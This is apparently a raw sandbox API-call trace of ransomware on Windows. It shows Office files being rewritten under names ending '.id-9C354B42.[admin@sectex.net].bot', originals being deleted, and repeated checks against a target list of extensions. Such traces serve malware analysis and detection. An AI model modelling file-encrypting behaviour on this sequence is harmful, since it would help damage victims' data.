	[0142.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0143.316] GetLastError () returned 0x0
	[0143.316] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x4c438, lpOverlapped=0x0) returned 1
	[0143.355] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x4c440, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x4c440, lpOverlapped=0x0) returned 1
	[0143.361] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.361] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.361] SetEndOfFile (hFile=0x398) returned 1
	[0143.385] CloseHandle (hObject=0x398) returned 1
	[0143.385] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.385] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.393] CloseHandle (hObject=0x3c0) returned 1
	[0143.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.393] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 1
	[0143.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.394] lstrlenW (lpString=".doc") returned 4
	[0143.394] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1
	[0143.394] lstrlenW (lpString=".docx") returned 5
	[0143.394] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1
	[0143.394] lstrlenW (lpString=".pdf") returned 4
	[0143.394] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1
	[0143.394] lstrlenW (lpString=".xls") returned 4
	[0143.394] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1
	[0143.394] lstrlenW (lpString=".xlsx") returned 5
	[0143.394] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1
	[0143.394] lstrlenW (lpString=".ppt") returned 4
	[0143.394] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1
	[0143.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.394] lstrlenW (lpString=".zip") returned 4
	[0143.394] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1
	[0143.394] lstrlenW (lpString=".rar") returned 4
	[0143.394] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1
	[0143.394] lstrlenW (lpString=".bz2") returned 4
	[0143.394] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1
	[0143.394] lstrlenW (lpString=".7z") returned 3
	[0143.394] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1
	[0143.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.394] lstrlenW (lpString=".dbf") returned 4
	[0143.394] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1
	[0143.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".1cd") returned 4
	[0143.395] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".jpg") returned 4
	[0143.395] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".doc") returned 4
	[0143.395] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1
	[0143.395] lstrlenW (lpString=".docx") returned 5
	[0143.395] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1
	[0143.395] lstrlenW (lpString=".pdf") returned 4
	[0143.395] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1
	[0143.395] lstrlenW (lpString=".xls") returned 4
	[0143.395] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1
	[0143.395] lstrlenW (lpString=".xlsx") returned 5
	[0143.395] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1
	[0143.395] lstrlenW (lpString=".ppt") returned 4
	[0143.395] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".zip") returned 4
	[0143.395] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1
	[0143.395] lstrlenW (lpString=".rar") returned 4
	[0143.395] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1
	[0143.395] lstrlenW (lpString=".bz2") returned 4
	[0143.395] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1
	[0143.395] lstrlenW (lpString=".7z") returned 3
	[0143.395] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".dbf") returned 4
	[0143.395] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1
	[0143.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.395] lstrlenW (lpString=".1cd") returned 4
	[0143.396] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1
	[0143.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66
	[0143.396] lstrlenW (lpString=".jpg") returned 4
	[0143.396] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1
	[0143.396] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.396] lstrlenW (lpString="ACCVDTUI.DLL") returned 12
	[0143.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.449] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=158600) returned 1
	[0143.449] CloseHandle (hObject=0x388) returned 1
	[0143.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll")) returned 0x20
	[0143.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.450] lstrlenW (lpString=".doc") returned 4
	[0143.450] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString=".docx") returned 5
	[0143.450] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.450] lstrlenW (lpString=".pdf") returned 4
	[0143.450] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString=".xls") returned 4
	[0143.450] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString=".xlsx") returned 5
	[0143.450] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.450] lstrlenW (lpString=".ppt") returned 4
	[0143.450] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.450] lstrlenW (lpString=".zip") returned 4
	[0143.450] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString=".rar") returned 4
	[0143.450] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.450] lstrlenW (lpString=".bz2") returned 4
	[0143.450] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.450] lstrlenW (lpString=".7z") returned 3
	[0143.450] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".dbf") returned 4
	[0143.451] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".1cd") returned 4
	[0143.451] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".jpg") returned 4
	[0143.451] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".doc") returned 4
	[0143.451] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString=".docx") returned 5
	[0143.451] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.451] lstrlenW (lpString=".pdf") returned 4
	[0143.451] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString=".xls") returned 4
	[0143.451] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString=".xlsx") returned 5
	[0143.451] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.451] lstrlenW (lpString=".ppt") returned 4
	[0143.451] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".zip") returned 4
	[0143.451] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString=".rar") returned 4
	[0143.451] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.451] lstrlenW (lpString=".bz2") returned 4
	[0143.451] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.451] lstrlenW (lpString=".7z") returned 3
	[0143.451] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.451] lstrlenW (lpString=".dbf") returned 4
	[0143.452] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.452] lstrlenW (lpString=".1cd") returned 4
	[0143.452] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60
	[0143.452] lstrlenW (lpString=".jpg") returned 4
	[0143.452] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.452] lstrcmpiW (lpString1=".HLP", lpString2=".bot") returned 1
	[0143.452] lstrlenW (lpString="ACTIP10.HLP") returned 11
	[0143.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.452] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=343520) returned 1
	[0143.452] CloseHandle (hObject=0x388) returned 1
	[0143.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp")) returned 0x20
	[0143.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.453] lstrlenW (lpString=".doc") returned 4
	[0143.453] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
	[0143.453] lstrlenW (lpString=".docx") returned 5
	[0143.453] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1
	[0143.453] lstrlenW (lpString=".pdf") returned 4
	[0143.453] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0143.453] lstrlenW (lpString=".xls") returned 4
	[0143.453] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0143.453] lstrlenW (lpString=".xlsx") returned 5
	[0143.453] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1
	[0143.453] lstrlenW (lpString=".ppt") returned 4
	[0143.453] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0143.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.453] lstrlenW (lpString=".zip") returned 4
	[0143.453] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0143.453] lstrlenW (lpString=".rar") returned 4
	[0143.453] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0143.453] lstrlenW (lpString=".bz2") returned 4
	[0143.453] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0143.453] lstrlenW (lpString=".7z") returned 3
	[0143.453] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0143.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.453] lstrlenW (lpString=".dbf") returned 4
	[0143.454] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString=".1cd") returned 4
	[0143.454] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString=".jpg") returned 4
	[0143.454] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString=".doc") returned 4
	[0143.454] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
	[0143.454] lstrlenW (lpString=".docx") returned 5
	[0143.454] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1
	[0143.454] lstrlenW (lpString=".pdf") returned 4
	[0143.454] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString=".xls") returned 4
	[0143.454] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString=".xlsx") returned 5
	[0143.454] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1
	[0143.454] lstrlenW (lpString=".ppt") returned 4
	[0143.454] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString=".zip") returned 4
	[0143.454] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString=".rar") returned 4
	[0143.454] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0143.454] lstrlenW (lpString=".bz2") returned 4
	[0143.454] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0143.454] lstrlenW (lpString=".7z") returned 3
	[0143.454] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.454] lstrlenW (lpString=".dbf") returned 4
	[0143.454] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0143.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.455] lstrlenW (lpString=".1cd") returned 4
	[0143.455] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0143.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59
	[0143.455] lstrlenW (lpString=".jpg") returned 4
	[0143.455] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0143.455] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.455] lstrlenW (lpString="ACWIZRC.DLL") returned 11
	[0143.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.455] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=275856) returned 1
	[0143.455] CloseHandle (hObject=0x388) returned 1
	[0143.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll")) returned 0x20
	[0143.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.457] lstrlenW (lpString=".doc") returned 4
	[0143.457] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString=".docx") returned 5
	[0143.457] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0143.457] lstrlenW (lpString=".pdf") returned 4
	[0143.457] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString=".xls") returned 4
	[0143.457] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString=".xlsx") returned 5
	[0143.457] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0143.457] lstrlenW (lpString=".ppt") returned 4
	[0143.457] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.457] lstrlenW (lpString=".zip") returned 4
	[0143.457] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString=".rar") returned 4
	[0143.457] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.457] lstrlenW (lpString=".bz2") returned 4
	[0143.458] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.458] lstrlenW (lpString=".7z") returned 3
	[0143.458] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString=".dbf") returned 4
	[0143.458] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString=".1cd") returned 4
	[0143.458] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString=".jpg") returned 4
	[0143.458] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString=".doc") returned 4
	[0143.458] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString=".docx") returned 5
	[0143.458] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0143.458] lstrlenW (lpString=".pdf") returned 4
	[0143.458] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString=".xls") returned 4
	[0143.458] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString=".xlsx") returned 5
	[0143.458] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0143.458] lstrlenW (lpString=".ppt") returned 4
	[0143.458] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.458] lstrlenW (lpString=".zip") returned 4
	[0143.458] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString=".rar") returned 4
	[0143.458] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.458] lstrlenW (lpString=".bz2") returned 4
	[0143.458] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.458] lstrlenW (lpString=".7z") returned 3
	[0143.459] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.459] lstrlenW (lpString=".dbf") returned 4
	[0143.459] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.459] lstrlenW (lpString=".1cd") returned 4
	[0143.459] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59
	[0143.459] lstrlenW (lpString=".jpg") returned 4
	[0143.459] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.459] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0143.459] lstrlenW (lpString="AEC.VSL") returned 7
	[0143.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.515] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=69496) returned 1
	[0143.515] CloseHandle (hObject=0x3b4) returned 1
	[0143.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl")) returned 0x20
	[0143.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.534] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.535] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
